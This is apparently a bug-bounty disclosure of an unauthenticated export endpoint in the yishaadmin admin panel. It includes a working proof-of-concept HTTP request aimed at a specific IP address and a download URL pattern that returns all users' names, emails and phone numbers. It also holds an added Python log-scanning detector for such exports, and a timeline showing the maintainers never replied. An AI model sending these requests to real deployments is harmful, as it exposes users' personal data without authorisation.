Improper Authentication in liukuo362573/yishaadmin
Valid
Reported on Jan 24th 2022
Description
Hi, I would like to report an improper authentication vulnerability in https://www.github.com/liukuo362573/yishaadmin. The endpoint "/admin/OrganizationManage/User/ExportUserJson" does not require any authentication and returns an xls file containing user data such as username, full name, email and phone.
Proof of Concept
- Step 1: Using BurpSuite, send this request:
POST /admin/OrganizationManage/User/ExportUserJson HTTP/1.1
Host: 106.14.124.170
Content-Length: 65
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://106.14.124.170
Referer: http://106.14.124.170/admin/OrganizationManage/User/UserIndex
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

DepartmentId=&UserName=&Mobile=&UserStatus=-1&StartTime=&EndTime=
- Step 2: Take the Data value from the response and open "http://106.14.124.170/admin/" + Data to download the data of all users. Example: http://106.14.124.170/admin/Resource/Export/Excel/259208c46e9f4bedb1c64bac56d9f16c_%E7%94%A8%E6%88%B7%E5%88%97%E8%A1%A8.xls
Impact
An unauthenticated user can obtain the data of all users in the application.
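As an added defender-side example (not part of this report or of the yishaadmin project), the following script flags successful requests to the two export paths named above that arrived with no session cookie, run over constructed access-log lines. The log format with a trailing cookie field, the cookie name, the IPs and the file name are assumptions.

```python
import re

# Constructed sample log lines (not taken from the report). Assumed format: combined
# log format with a trailing cookie="..." field, where "-" means no cookie was sent.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Jan/2022:10:01:02 +0000] "POST /admin/OrganizationManage/User/ExportUserJson HTTP/1.1" 200 312 "-" "Mozilla/5.0" cookie="-"
10.0.0.5 - - [24/Jan/2022:10:01:05 +0000] "GET /admin/Resource/Export/Excel/CONSTRUCTED_users.xls HTTP/1.1" 200 48211 "-" "Mozilla/5.0" cookie="-"
10.0.0.9 - - [24/Jan/2022:10:02:10 +0000] "POST /admin/OrganizationManage/User/ExportUserJson HTTP/1.1" 200 312 "http://example.invalid/admin/OrganizationManage/User/UserIndex" "Mozilla/5.0" cookie="ASP.NET_SessionId=PLACEHOLDER"
10.0.0.9 - - [24/Jan/2022:10:02:11 +0000] "GET /admin/OrganizationManage/User/UserIndex HTTP/1.1" 200 9000 "-" "Mozilla/5.0" cookie="ASP.NET_SessionId=PLACEHOLDER"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" cookie="(?P<cookie>[^"]*)"$'
)

# The export trigger and the download path from the report; both should need a session.
SENSITIVE_PATHS = (
    re.compile(r"^/admin/OrganizationManage/User/ExportUserJson$"),
    re.compile(r"^/admin/Resource/Export/Excel/"),
)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def find_unauthenticated_exports(log_text):
    """Flag 2xx responses on export endpoints where the request carried no session cookie."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if not any(p.match(rec["path"]) for p in SENSITIVE_PATHS):
            continue
        if rec["cookie"] == "-" and rec["status"].startswith("2"):
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"]})
    return findings


if __name__ == "__main__":
    for f in find_unauthenticated_exports(SAMPLE_LOG):
        print(f"ALERT unauthenticated export: {f['ip']} {f['ts']} {f['path']}")
```

On a patched deployment the same rule should fire only on non-2xx responses, which makes it a cheap regression check that the authentication requirement stayed in place.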
We are processing your report and will contact the liukuo362573/yishaadmin team within 24 hours. (a year ago)
We have contacted a member of the liukuo362573/yishaadmin team and are waiting to hear back. (a year ago)
We have sent a follow up to the liukuo362573/yishaadmin team. We will try again in 7 days. (a year ago)
We have sent a second follow up to the liukuo362573/yishaadmin team. We will try again in 10 days. (a year ago)
The fix bounty has been dropped
This vulnerability will not receive a CVE